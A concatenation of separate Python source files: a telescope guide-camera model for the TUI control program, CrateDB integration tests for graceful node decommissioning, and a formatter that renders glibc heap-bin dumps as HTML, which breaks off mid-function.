each.terminate()
each.join(1)
def main():
cli()
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
"""Model for guide cameras.
Warning: the config stuff will probably be modified.
2005-01-28 ROwen preliminary; has all existing keywords, but there will be more
and "star" will probably change to include ellipticity.
2005-02-23 ROwen added expTime and thresh.
2005-03-14 ROwen overhauled for new keywords
2005-03-30 ROwen overhauled again for new keywords files and star keywords.
2005-04-11 ROwen Renamed to GuideModel from GCamModel (because an actor is named gcam).
2005-04-13 ROwen Bug fix: was refreshing all keywords. Was refreshing nonexistent keyword time.
2005-04-20 ROwen Removed expTime; get from FITS header instead.
Added default exposure time and bin factor to camInfo.
Tweaked description of fs...Thresh keywords, since they now
also apply to centroid.
2005-06-08 ROwen Added noStarsFound and starQuality.
2005-06-10 ROwen Added playing of sound cues.
Renamed noStarsFound to noGuideStar.
Modified starQuality to accept additional values.
2005-06-17 ROwen Guide start/stop sounds only play if the state has changed.
Thus one can quietly ask for guide status.
2005-06-23 ROwen Modified to not play NoGuideStar sound unless the keyword is "genuine".
This is mostly paranoia since it's not auto-refreshed anyway.
2005-06-27 ROwen Changed default bin factor from 3 to 1 for the DIS and Echelle slitviewers.
2005-07-08 ROwen Modified for http download:
- Changed ftpLogWdg to downloadWdg.
- Removed imageRoot.
2005-08-02 ROwen Modified for TUI.Sounds->TUI.PlaySound.
2005-10-24 ROwen Lowered default min exposure time to 0 sec.
2006-03-28 ROwen Added "nfocus" actor.
Added guideMode keyword.
Bug fix: fsActRadMult was listening for fsDefRadMult.
2006-04-14 ROwen Added locGuideMode.
Play a sound when locGuideMode changes while guiding.
2006-05-18 ROwen Added measOffset and actOffset.
Added support for predicted position for star="g"...
Added support for NaN in star values.
2006-05-22 ROwen Changed the default exposure time from 10 to 5 seconds
by request of the obs specs.
2006-03-03 ROwen Added imSize to gcamInfo. This may be a temporary hack,
since it would be better to get the info from the hub.
2007-01-29 ROwen Bug fix: guiding sound cues were not always played because
"starting" and perhaps "stopping" states were not always sent.
2007-06-05 ROwen Added "sfocus" actor.
2008-02-04 ROwen Added locGuideStateSummary.
2008-03-14 ROwen Added tcam actor.
2008-03-17 ROwen Bug fix: tcam was not listed as a slitviewer.
2008-03-25 ROwen PR 744: changed default nfocus exposure time to 6 seconds.
2008-04-01 ROwen Bug fix: _updLocGuideModeSummary mis-handled a mode of None.
2008-04-22 ROwen Added expState.
2008-04-23 ROwen Get expState from the cache (finally) but null out the times.
Modified expState so durations can be None or 0 for unknown (was just 0).
2008-07-24 ROwen Fixed CR 851: changed tcam default bin factor to 2 (from 1).
2010-03-04 ROwen Changed gcam info field slitViewer to isSlitViewer.
2010-03-18 ROwen Added "afocus" actor.
2010-10-20 ROwen Modified to not auto-refresh expState keyvar for focus actors; expState isn't
output by focus actors, but it's more consistent to leave it in with a null value.
2012-08-10 ROwen Updated for RO.Comm 3.0.
2015-06-01 ROwen Updated for new dcam, which has size 1024x1024 instead of 512x512.
2015-11-05 ROwen Changed ==/!= True/False to is/is not True/False to modernize the code.
"""
__all__ = ['getModel']
import RO.CnvUtil
import RO.KeyVariable
import TUI.TUIModel
import TUI.PlaySound
class _GCamInfo:
"""Exposure information for a camera
Inputs:
- min/maxExpTime: minimum and maximum exposure time (sec)
- isSlitViewer: True if a slit viewer
"""
def __init__(self,
imSize,
minExpTime = 0.0,
maxExpTime = 3600,
defBinFac = 1,
defExpTime = 5,
isSlitViewer = False,
):
self.imSize = imSize
self.minExpTime = float(minExpTime)
self.maxExpTime = float(maxExpTime)
self.defBinFac = defBinFac
self.defExpTime = defExpTime
self.isSlitViewer = bool(isSlitViewer)
# dictionary of instrument information
# instrument names must be lowercase
_GCamInfoDict = {
"dcam": _GCamInfo(
imSize = (1024, 1024),
minExpTime = 0.3,
isSlitViewer = True,
),
"ecam": _GCamInfo(
imSize = (512, 512),
isSlitViewer = True,
),
"gcam": _GCamInfo(
imSize = (1024, 1024),
defBinFac = 3,
),
"tcam":_GCamInfo(
imSize = (1024, 1024),
isSlitViewer = True,
defBinFac = 2,
),
"afocus":_GCamInfo(
imSize = (1024, 1024),
),
"nfocus":_GCamInfo(
imSize = (1024, 1024),
defExpTime = 6,
),
"sfocus":_GCamInfo(
imSize = (2048, 2048),
),
}
# cache of guide camera models
# each entry is gcamName: model
_modelDict = {}
def getModel(gcamName):
global _modelDict
gcamNameLow = gcamName.lower()
model = _modelDict.get(gcamNameLow)
if model is None:
model = Model(gcamName)
_modelDict[gcamNameLow] = model
return model
def modelIter():
for gcamName in _GCamInfoDict.iterkeys():
yield getModel(gcamName)
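# Hedged usage sketch: models are created lazily and cached by lower-case
# actor name, so repeated lookups return the same object:
#   assert getModel("DCAM") is getModel("dcam")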
class Model (object):
def __init__(self, gcamName):
self.gcamName = gcamName
self.actor = gcamName.lower()
self._isGuiding = None
self._isFocusActor = self.actor.endswith("focus")
self.gcamInfo = _GCamInfoDict[self.actor]
self.tuiModel = TUI.TUIModel.getModel()
keyVarFact = RO.KeyVariable.KeyVarFactory(
actor = self.actor,
dispatcher = self.tuiModel.dispatcher,
converters = str,
allowRefresh = True,
)
self.expState = keyVarFact(
keyword = "expState",
converters = (str, str, RO.CnvUtil.asFloatOrNone, RO.CnvUtil.asFloatOrNone),
description = """current exposure info:
- exposure state; one of: idle, flushing, integrating, paused,
reading, processing, aborting, done or aborted.
- start time (an ANSI-format UTC timestamp)
- remaining time for this state (sec; 0 or None if short or unknown)
- total time for this state (sec; 0 or None if short or unknown)
            Note: if the data is cached then remaining time and total time
            are changed to None to indicate that the values are unknown
""",
allowRefresh = not self._isFocusActor,
)
self.expState.addCallback(self._updExpState)
# keywords for parameters
self.fsActRadMult = keyVarFact(
keyword="fsActRadMult",
converters = RO.CnvUtil.asFloat,
description="""Actual findStars radius multiplier""",
allowRefresh = False,
)
self.fsActThresh = keyVarFact(
keyword="fsActThresh",
converters = RO.CnvUtil.asFloat,
description="""Actual findStars and centroid threshold (sigma)""",
allowRefresh = False,
)
self.fsDefRadMult = keyVarFact(
keyword="fsDefRadMult",
converters = RO.CnvUtil.asFloat,
description="""Default findStars radius multiplier""",
)
self.fsDefThresh = keyVarFact(
keyword="fsDefThresh",
converters = RO.CnvUtil.asFloat,
description="""Default findStars and centroid threshold (sigma)""",
)
self.files = keyVarFact(
keyword="files",
nval = (5, None),
converters = (str, RO.CnvUtil.asBool, str),
description="""Image used for command:
- command: one of: c (centroid), f (findStars) or g (guiding)
- isNew: 1 if a new file, 0 if an existing file
- baseDir: base directory for these files (relative to image root)
- finalFile: image file (with any processing)
- maskFile: mask file
other values may be added
""",
allowRefresh = False,
)
self.guideState = keyVarFact(
keyword="guideState",
nval=(1,None),
description="""State of guide actor. Fields are:
- mainState: one of: on, starting, stopping, off
any remaining fields are supplementary info
""",
)
self.guideState.addIndexedCallback(self._updGuideState)
self.locGuideMode = keyVarFact(
keyword="locGuideMode",
description="""like guideMode, but restricted to one of:
field, boresight, manual, "" or None
and lowercase is guaranteed""",
isLocal = True,
)
self.locGuideStateSummary = keyVarFact(
keyword = "locGuideStateSummary",
nval=1,
description = """Summary of state of guide actor; one of: on, off, starting, stopping, manual
where manual means guide state = on and guide mode = manual
""",
isLocal = True,
)
self.guideMode = keyVarFact(
keyword="guideMode",
            description="one of: field, boresight, manual, or possibly other values",
)
self.guideMode.addIndexedCallback(self._updGuideMode)
self.star = keyVarFact(
keyword="star",
nval = (15,17),
converters = (str, int, RO.CnvUtil.asFloatOrNone),
description="""Data about a star.
The fields are as follows, where lengths and positions are in binned pixels
and intensities are in ADUs:
            0 type character: c = centroid, f = findstars, g = guide star
1 index: an index identifying the star within the list of stars returned by the command.
2,3 x,yCenter: centroid
4,5 x,yError: estimated standard deviation of x,yCenter
6 radius: radius of centroid region
7 asymmetry: a measure of the asymmetry of the object;
the value minimized by PyGuide.centroid.
Warning: not normalized, so probably not much use.
8 FWHM major
9 FWHM minor
10 ellMajAng: angle of ellipse major axis in x,y frame (deg)
11 chiSq: goodness of fit to model star (a double gaussian). From PyGuide.starShape.
12 counts: sum of all unmasked pixels within the centroid radius. From PyGuide.centroid
13 background: background level of fit to model star. From PyGuide.starShape
14 amplitude: amplitude of fit to model star. From PyGuide.starShape
For "g" stars, the two following fields are added:
15,16 predicted x,y position
""",
allowRefresh = False,
)
self.measOffset = keyVarFact(
keyword="measOffset",
nval = 2,
converters = float,
            description="""The measured offset of the guide star from its predicted position, in az/alt arcseconds. See also actOffset.""",
allowRefresh = False,
)
self.actOffset = keyVarFact(
keyword="actOffset",
nval = 2,
converters = float,
            description="""The offset that will be sent to the TCC, in az/alt arcseconds. This is measOffset adjusted as the hub guider sees fit.""",
allowRefresh = False,
)
self.noGuideStar = keyVarFact(
keyword="NoGuideStar",
nval = 0,
description="Guide loop found no stars.",
allowRefresh = False,
)
self.noGuideStar.addCallback(self._updNoGuideStar)
self.starQuality = keyVarFact(
keyword="StarQuality",
nval = (1, None),
converters = RO.CnvUtil.asFloatOrNone,
description="""Guide iteration centroid quality.
0 overall quality; a value between 0 and 1
additional fields may be used for components of star quality
""",
allowRefresh = False,
)
keyVarFact.setKeysRefreshCmd()
self.ftpSaveToPref = self.tuiModel.prefs.getPrefVar("Save To")
downloadTL = self.tuiModel.tlSet.getToplevel("TUI.Downloads")
self.downloadWdg = downloadTL and downloadTL.getWdg()
def _updLocGuideModeSummary(self):
"""Compute new local guide mode summary"""
guideState, gsCurr = self.guideState.getInd(0)
if guideState is None:
return
if guideState.lower() != "on":
self.locGuideStateSummary.set((guideState,), isCurrent = gsCurr)
return
guideMode, gmCurr = self.locGuideMode.getInd(0)
if guideMode == "manual":
self.locGuideStateSummary.set((guideMode,), isCurrent = gsCurr and gmCurr)
else:
self.locGuideStateSummary.set((guideState,), isCurrent = gsCurr)
def _updGuideMode(self, guideMode, isCurrent, **kargs):
"""Handle new guideMode.
Set locGuideMode and play "Guide Mode Changed"
as appropriate.
"""
if not guideMode:
self.locGuideMode.set((None,), isCurrent = isCurrent)
return
gmLower = guideMode.lower()
if gmLower not in ("boresight", "field", "manual", None):
return
if gmLower and isCurrent:
guideState, gsIsCurrent = self.guideState.getInd(0)
locGuideMode, lgmIsCurrent = self.locGuideMode.getInd(0)
if guideState and gsIsCurrent and \
locGuideMode and lgmIsCurrent and \
(gmLower != locGuideMode) and \
(guideState.lower() == "on"):
TUI.PlaySound.guideModeChanges()
self.locGuideMode.set((gmLower,), isCurrent)
self._updLocGuideModeSummary()
def _updExpState(self, expState, isCurrent, keyVar):
"""Set the durations to None (unknown) if data is from the cache"""
if keyVar.isGenuine():
return
modValues = list(expState)
modValues[2] = None
modValues[3] = None
keyVar._valueList = tuple(modValues)
def _updGuideState(self, guideState, isCurrent, **kargs):
if not isCurrent:
if not self.tuiModel.dispatcher.connection.isConnected:
self._isGuiding = None
return
gsLower = guideState.lower()
if gsLower in ("starting", "on"):
if self._isGuiding is not True:
TUI.PlaySound.guidingBegins()
self._isGuiding = True
elif gsLower == "stopping":
if self._isGuiding is not False:
TUI.PlaySound.guidingEnds()
self._isGuiding = False
self._updLocGuideModeSummary()
def _updNoGuideStar(self, noData, isCurrent, **kargs):
if not isCurrent:
return
if not self.guideState.isGenuine():
return
        guideState, gsCurr = self.guideState.getInd(0)
        if not guideState or guideState.lower() not in ("on", "starting"):
return
TUI.PlaySound.noGuideStar()
if __name__ == "__main__":
# getModel("dcam")
getModel("ecam")
getModel("gcam")
|
|
# -*- coding: utf-8; -*-
#
# Licensed to Crate.io GmbH ("Crate") under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. Crate licenses
# this file to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# However, if you have executed another commercial license agreement
# with Crate these terms will supersede the license and you may use the
# software solely pursuant to the terms of the relevant commercial agreement.
import unittest
import os
import time
import random
import string
import threading
from cr8.run_crate import CrateNode
from crate.client.http import Client
from crate.client.exceptions import ProgrammingError, ConnectionError
from testutils.paths import crate_path
from testutils.ports import bind_range
def decommission(client, node):
try:
return client.sql('alter cluster decommission ?', (node,))
except ConnectionError:
pass
def retry_sql(client, statement):
""" retry statement on node not found in cluster state errors
sys.shards queries might fail if a node that has shutdown is still
in the cluster state
"""
wait_time = 0
sleep_duration = 0.01
last_error = None
while wait_time < 10.5:
try:
return client.sql(statement)
except ProgrammingError as e:
if ('not found in cluster state' in e.message or
'Node not connected' in e.message):
time.sleep(sleep_duration)
last_error = e
wait_time += sleep_duration
sleep_duration *= 2
continue
raise e
raise last_error
def wait_for_cluster_size(client, expected_size, timeout_in_s=20):
""" retry check (up to timeout_in_s) for expected cluster size
Returns True if the cluster size reaches the expected one, False otherwise
Can raise: Value Error -- for a negative value of expected_size
TimeoutError -- after timeout_in_s
A node can be decommissioned with a delay, this can be
used to check when a node is indeed decommissioned
"""
if expected_size < 0:
raise ValueError('expected_size cannot be negative')
wait_time = 0
sleep_duration = 1
num_nodes = -1
while num_nodes != expected_size:
time.sleep(sleep_duration)
wait_time += sleep_duration
response = client.sql("select * from sys.nodes")
num_nodes = response.get("rowcount", -1)
if num_nodes == -1:
return False
if wait_time > timeout_in_s:
raise TimeoutError('Timeout occurred ({}s) while waiting for cluster size to become {}'
.format(timeout_in_s, expected_size))
return True
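# Hedged sketch of the decommission/verify pattern exercised by the tests below:
#   decommission(clients[0], node_names[0])
#   assert wait_for_cluster_size(clients[1], expected_size=NUM_SERVERS - 1)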
class GracefulStopCrateLayer(CrateNode):
MAX_RETRIES = 3
def start(self, retry=0):
if retry >= self.MAX_RETRIES:
raise SystemError('Could not start Crate server. Max retries exceeded!')
try:
super().start()
except Exception:
self.start(retry=retry + 1)
def stop(self):
"""do not care if process already died"""
try:
super().stop()
except OSError:
pass
class GracefulStopTest(unittest.TestCase):
"""
abstract class for starting a cluster of crate instances
and testing against them
"""
DEFAULT_NUM_SERVERS = 1
def __init__(self, *args, **kwargs):
self.num_servers = kwargs.pop("num_servers", getattr(self, "NUM_SERVERS", self.DEFAULT_NUM_SERVERS))
super().__init__(*args, **kwargs)
def setUp(self):
self.crates = []
self.clients = []
self.node_names = []
# auto-discovery with unicast on the same host only works if all nodes are configured with the same port range
transport_port_range = bind_range(range_size=self.num_servers)
for i in range(self.num_servers):
layer = GracefulStopCrateLayer(
crate_dir=crate_path(),
settings={
'cluster.name': self.__class__.__name__,
'node.name': self.node_name(i),
'transport.tcp.port': transport_port_range,
},
env={
**os.environ.copy(),
'CRATE_HEAP_SIZE': '256M'
},
version=(4, 0, 0)
)
layer.start()
self.clients.append(Client(layer.http_url))
self.crates.append(layer)
self.node_names.append(self.node_name(i))
client = self.random_client()
num_nodes = 0
# wait until all nodes joined the cluster
while num_nodes < len(self.crates):
response = client.sql("select * from sys.nodes")
num_nodes = response.get("rowcount", 0)
time.sleep(.5)
def tearDown(self):
for client in self.clients:
client.close()
for layer in self.crates:
layer.stop()
def random_client(self):
return random.choice(self.clients)
def node_name(self, i):
return "crate_{0}_{1}".format(self.__class__.__name__, i)
def set_settings(self, settings):
client = self.random_client()
for key, value in settings.items():
client.sql("set global transient {}=?".format(key), (value,))
class TestGracefulStopPrimaries(GracefulStopTest):
NUM_SERVERS = 3
def setUp(self):
super().setUp()
client = self.clients[0]
client.sql("create table t1 (id int, name string) "
"clustered into 4 shards "
"with (number_of_replicas=0)")
client.sql("insert into t1 (id, name) values (?, ?), (?, ?)",
(1, "Ford", 2, "Trillian"))
client.sql("refresh table t1")
def test_graceful_stop_primaries(self):
"""
test min_availability: primaries
"""
client2 = self.clients[1]
self.set_settings({"cluster.graceful_stop.min_availability": "primaries"})
decommission(self.clients[0], self.node_names[0])
self.assertEqual(wait_for_cluster_size(client2, TestGracefulStopPrimaries.NUM_SERVERS - 1), True)
stmt = "select table_name, id from sys.shards where state = 'UNASSIGNED'"
response = retry_sql(client2, stmt)
# assert that all shards are assigned
self.assertEqual(response.get("rowcount", -1), 0)
def tearDown(self):
client = self.clients[1]
client.sql("drop table t1")
super().tearDown()
class TestGracefulStopFull(GracefulStopTest):
NUM_SERVERS = 3
def setUp(self):
super().setUp()
client = self.clients[0]
client.sql("create table t1 (id int, name string) "
"clustered into 4 shards "
"with (number_of_replicas=1)")
client.sql("insert into t1 (id, name) values (?, ?), (?, ?)",
(1, "Ford", 2, "Trillian"))
client.sql("refresh table t1")
def test_graceful_stop_full(self):
"""
min_availability: full moves all shards
"""
node1, node2, node3 = self.node_names
client1, client2, client3 = self.clients
self.set_settings({"cluster.graceful_stop.min_availability": "full"})
decommission(client2, node1)
self.assertEqual(wait_for_cluster_size(client2, TestGracefulStopFull.NUM_SERVERS - 1), True)
stmt = "select table_name, id from sys.shards where state = 'UNASSIGNED'"
response = retry_sql(client2, stmt)
# assert that all shards are assigned
self.assertEqual(response.get("rowcount", -1), 0)
def tearDown(self):
client = self.clients[2]
client.sql("drop table t1")
super().tearDown()
class TestGracefulStopNone(GracefulStopTest):
NUM_SERVERS = 3
def setUp(self):
super().setUp()
client = self.clients[0]
client.sql("create table t1 (id int, name string) "
"clustered into 8 shards "
"with (number_of_replicas=0)")
client.sql("refresh table t1")
names = ("Ford", "Trillian", "Zaphod", "Jeltz")
for i in range(16):
client.sql("insert into t1 (id, name) "
"values (?, ?)",
(i, random.choice(names)))
client.sql("refresh table t1")
def test_graceful_stop_none(self):
"""
test `min_availability: none` will stop the node immediately.
Causes some shard to become unassigned (no replicas)
"""
client2 = self.clients[1]
self.set_settings({"cluster.graceful_stop.min_availability": "none"})
decommission(self.clients[0], self.node_names[0])
self.assertEqual(wait_for_cluster_size(client2, TestGracefulStopNone.NUM_SERVERS - 1), True)
stmt = "select node['id'] as node_id, id, state \
from sys.shards where state='UNASSIGNED'"
resp = retry_sql(client2, stmt)
# since there were no replicas some shards must be missing
unassigned_shards = resp.get("rowcount", -1)
self.assertTrue(
unassigned_shards > 0,
"{0} unassigned shards, expected more than 0".format(unassigned_shards)
)
def tearDown(self):
client = self.clients[1]
client.sql("drop table t1")
super().tearDown()
class TestGracefulStopDuringQueryExecution(GracefulStopTest):
NUM_SERVERS = 3
def setUp(self):
super().setUp()
client = self.clients[0]
client.sql('''
CREATE TABLE t1 (id int primary key, name string)
CLUSTERED INTO 4 SHARDS
WITH (number_of_replicas = 1)
''')
def bulk_params():
for i in range(5000):
chars = list(string.ascii_lowercase[:14])
random.shuffle(chars)
yield (i, ''.join(chars))
bulk_params = list(bulk_params())
client.sql('INSERT INTO t1 (id, name) values (?, ?)', None, bulk_params)
client.sql('REFRESH TABLE t1')
def test_graceful_stop_concurrent_queries(self):
self.set_settings({
"cluster.graceful_stop.min_availability": "full",
"cluster.graceful_stop.force": "false"
})
concurrency = 4
client = self.clients[0]
run_queries = [True]
errors = []
threads_finished_b = threading.Barrier((concurrency * 3) + 1)
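        # one barrier party per worker thread (3 per loop iteration: select,
        # insert, delete) plus the main thread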
func_args = (client, run_queries, errors, threads_finished_b)
for i in range(concurrency):
t = threading.Thread(
target=TestGracefulStopDuringQueryExecution.exec_select_queries,
args=func_args
)
t.start()
t = threading.Thread(
target=TestGracefulStopDuringQueryExecution.exec_insert_queries,
args=func_args
)
t.start()
t = threading.Thread(
target=TestGracefulStopDuringQueryExecution.exec_delete_queries,
args=func_args
)
t.start()
decommission(self.clients[1], self.node_names[1])
self.assertEqual(wait_for_cluster_size(self.clients[0], TestGracefulStopDuringQueryExecution.NUM_SERVERS - 1), True)
run_queries[0] = False
threads_finished_b.wait()
self.assertEqual(errors, [])
def tearDown(self):
self.clients[0].sql('DROP TABLE t1')
super().tearDown()
@staticmethod
def exec_insert_queries(client, is_active, errors, finished):
while is_active[0]:
try:
chars = list(string.ascii_lowercase[:14])
random.shuffle(chars)
client.sql(
'insert into t1 (id, name) values ($1, $2) on conflict (id) do update set name = $2',
(random.randint(0, 2147483647), ''.join(chars))
)
except Exception as e:
errors.append(e)
finished.wait()
@staticmethod
def exec_delete_queries(client, is_active, errors, finished):
while is_active[0]:
try:
chars = list(string.ascii_lowercase[:14])
random.shuffle(chars)
pattern = ''.join(chars[:3]) + '%'
client.sql(
'delete from t1 where name like ?', (pattern,))
except Exception as e:
if 'RelationUnknown' not in str(e):
errors.append(e)
finished.wait()
@staticmethod
def exec_select_queries(client, is_active, errors, finished):
while is_active[0]:
try:
client.sql('select name, count(*) from t1 group by name')
except Exception as e:
errors.append(e)
finished.wait()
|
|
# supported_libc maps a "<libc version>-<architecture>" key to the line range of
# the hexdump that holds the malloc_state structure from the libc data segment.
# F.i. "2.23-32" is libc 2.23 on 32 bit, and "61-95" means that from line 61 to
# line 95 of the hexdump we have the info about the bins.
import pdb
class HeapyLibcFormatter:
def __init__(self,libc_dump_full_path,proc_info,soup):
self.supported_libc = {"2.19-64": "60-128", "2.19-32": "34-68", "2.23-64": "90-158", "2.23-32": "61-95"}
self.formatter_dictionary = {"2.19-64": self.formatter_1 , "2.23-64": self.formatter_1, "2.23-32": self.formatter_2, "2.19-32": self.formatter_2}
self.libc_dump_full_path = libc_dump_full_path
self.proc_info = proc_info
self.soup = soup
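    # Example (hypothetical values): a 64-bit process running libc 2.23 yields
    # the key "2.23-64", i.e. hexdump lines 90-158 and formatter_1 below.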
    def format(self):
        libc_version = self.proc_info.libc_version
        arch = self.proc_info.architecture
        lines_range = self.supported_libc.get(libc_version+"-"+arch,"")
        if lines_range != "": # let's extract only the lines in which there is the malloc_state struct
            start_line = int(lines_range.split("-")[0],10)
            end_line = int(lines_range.split("-")[1],10)
            formatter = self.formatter_dictionary.get(libc_version+"-"+arch, self.formatter_0) # extract the right formatter for this libc
        else:
            print "[ERROR] Libc not supported - heapy will paste the raw dump"
            start_line, end_line = 0, 10**9 # paste the whole dump
            formatter = self.formatter_0
        formatter(start_line,end_line)
    # generic formatter: pastes the raw dump into the libc section of the final report
    def formatter_0(self,start_line,end_line):
        f = open(self.libc_dump_full_path, "r")
        div_libcdump = self.soup.find(id="libcdump")
        cont = 0 # current hexdump line number
        for line in f.readlines(): # skip lines outside the range to avoid pasting useless stuff in the libc view
            if cont < start_line:
                cont+=1
                continue
            if cont > end_line:
                break
            # first entry of the line is the memory address
            font_tag = self.soup.new_tag('font')
            font_tag['style'] = "color: black; font-weight: bold;"
            font_tag.string = str(line.split(" ")[0]) # let's paint the address
            div_libcdump.append(font_tag)
            line = " ".join(line.split(" ")[1:]) # remove the address from the line
            p_tag = self.soup.new_tag('p')
            p_tag.string = str(line)
            p_tag['style'] = "font-family: monospace;display:inline;"
            div_libcdump.append(p_tag)
            div_space_tag = self.soup.new_tag('div')
            div_space_tag['style'] = "font-size:0;height:1px;"
            div_libcdump.append(div_space_tag)
            cont += 1
        f.close()
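    # formatter for 32-bit libc dumps: each malloc_state field is a single
    # dword, so values are taken one hexdump column at a time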
def formatter_2(self,start_line,end_line):
f = open(self.libc_dump_full_path, "r")
div_libcdump = self.soup.find(id="libcdump")
for i in xrange(0,start_line,1):
            line = f.readline().rstrip() # skip the lines before the malloc_state range
line = line.split(" ")
line = line[2:] # remove the memory address and the first empty dword
        # spacer
        div_space = self.soup.new_tag('div')
        div_space['style'] = "font-size:0;height:5px;"
        div_libcdump.append(div_space)
        # flags dword
        flags_div = self.soup.new_tag('div')
        flags_div['style'] = "font-family: monospace;display:inline;"
        flags_div.string = "flags: " + line[0]
        div_libcdump.append(flags_div)
        line = line[1:] # discard the processed element
# fastbins
for i in xrange(0,10,1):
if line == []:
line = f.readline().rstrip().split(" ")
line = line[1:]
fastbin_div = self.soup.new_tag('div')
fastbin_div['style'] = "font-family: monospace;display:inline;"
fastbin_div.string = "fastbin["+str(i)+"]-> 0x" + line[0]
div_libcdump.append(fastbin_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[1:]
#pdb.set_trace()
#top chunk
top_chunk_div = self.soup.new_tag('div')
top_chunk_div['style'] = "font-family: monospace;display:inline;"
top_chunk_div.string = "topchunk: 0x" + line[0]
div_libcdump.append(top_chunk_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[1:]
#last remains
last_remain_div = self.soup.new_tag('div')
last_remain_div['style'] = "font-family: monospace;display:inline;"
last_remain_div.string = "last remainder: 0x" + line[0]
div_libcdump.append(last_remain_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[1:]
#unsorted bin
unsorted_bin_fd = self.soup.new_tag('div')
unsorted_bin_fd['style'] = "font-family: monospace;display:inline;"
unsorted_bin_fd.string = "unsorted bin{fd} -> 0x" + line[0]
div_libcdump.append(unsorted_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[1:]
unsorted_bin_fd = self.soup.new_tag('div')
unsorted_bin_fd['style'] = "font-family: monospace;display:inline;"
unsorted_bin_fd.string = "unsorted bin{bk} -> 0x" + line[0]
div_libcdump.append(unsorted_bin_fd)
line = line[1:]
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
#small bins
for i in xrange(0,62,1):
if line == []:
line = f.readline().rstrip().split(" ")
line = line[1:]
small_bin_fd = self.soup.new_tag('div')
small_bin_fd['style'] = "font-family: monospace;display:inline;"
small_bin_fd.string = "smallbin["+str(i)+"]{fd}-> 0x" + line[0]
div_libcdump.append(small_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
small_bin_bk = self.soup.new_tag('div')
small_bin_bk['style'] = "font-family: monospace;display:inline;"
small_bin_bk.string = "smallbin["+str(i)+"]{bk}-> 0x" + line[1]
div_libcdump.append(small_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
#large bins
        for i in xrange(0,60,1):
            if line == []: # refill the buffer before processing this bin
                line = f.readline().rstrip().split(" ")
                line = line[1:]
            large_bin_fd = self.soup.new_tag('div')
            large_bin_fd['style'] = "font-family: monospace;display:inline;"
            large_bin_fd.string = "largebin["+str(i)+"]{fd}-> 0x" + line[0]
            div_libcdump.append(large_bin_fd)
            div_space = self.soup.new_tag('div')
            div_space['style'] = "font-size:0;height:5px;"
            div_libcdump.append(div_space)
            large_bin_bk = self.soup.new_tag('div')
            large_bin_bk['style'] = "font-family: monospace;display:inline;"
            large_bin_bk.string = "largebin["+str(i)+"]{bk}-> 0x" + line[1]
            div_libcdump.append(large_bin_bk)
            div_space = self.soup.new_tag('div')
            div_space['style'] = "font-size:0;height:5px;"
            div_libcdump.append(div_space)
            line = line[2:]
    # this formatter prints out the information about the bins discovered in the libc dump
def formatter_1(self,start_line,end_line):
f = open(self.libc_dump_full_path, "r")
div_libcdump = self.soup.find(id="libcdump")
for i in xrange(0,start_line,1):
            line = f.readline().rstrip() # skip the lines before the malloc_state range
line = line.split(" ")
line = line[1:] # remove the memory address
        # spacer
        div_space = self.soup.new_tag('div')
        div_space['style'] = "font-size:0;height:5px;"
        div_libcdump.append(div_space)
        # flags qword (two little-endian dwords: high then low)
        flags_div = self.soup.new_tag('div')
        flags_div['style'] = "font-family: monospace;display:inline;"
        flags_div.string = "flags: " + line[1] + line[0]
        div_libcdump.append(flags_div)
        line = line[2:] # discard the first processed elements
# fastbins
for i in xrange(0,10,1):
if line == []:
line = f.readline().rstrip().split(" ")
line = line[1:]
fastbin_div = self.soup.new_tag('div')
fastbin_div['style'] = "font-family: monospace;display:inline;"
fastbin_div.string = "fastbin["+str(i)+"]-> 0x" + line[1] + line[0]
div_libcdump.append(fastbin_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
#top chunk
top_chunk_div = self.soup.new_tag('div')
top_chunk_div['style'] = "font-family: monospace;display:inline;"
top_chunk_div.string = "topchunk: 0x" + line[1] + line[0]
div_libcdump.append(top_chunk_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = f.readline().rstrip().split(" ")
line = line[1:]
#last remains
last_remain_div = self.soup.new_tag('div')
last_remain_div['style'] = "font-family: monospace;display:inline;"
last_remain_div.string = "last remainder: 0x" + line[1] + line[0]
div_libcdump.append(last_remain_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
#unsorted bin
unsorted_bin_fd = self.soup.new_tag('div')
unsorted_bin_fd['style'] = "font-family: monospace;display:inline;"
unsorted_bin_fd.string = "unsorted bin{fd} -> 0x" + line[1] + line[0]
div_libcdump.append(unsorted_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
unsorted_bin_fd = self.soup.new_tag('div')
unsorted_bin_fd['style'] = "font-family: monospace;display:inline;"
unsorted_bin_fd.string = "unsorted bin{bk} -> 0x" + line[1] + line[0]
div_libcdump.append(unsorted_bin_fd)
line = line[2:]
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
#small bins
for i in xrange(0,62,1):
if len(line) == 2:
nextline = f.readline().rstrip().split(" ")
nextline = nextline[1:]
small_bin_fd = self.soup.new_tag('div')
small_bin_fd['style'] = "font-family: monospace;display:inline;"
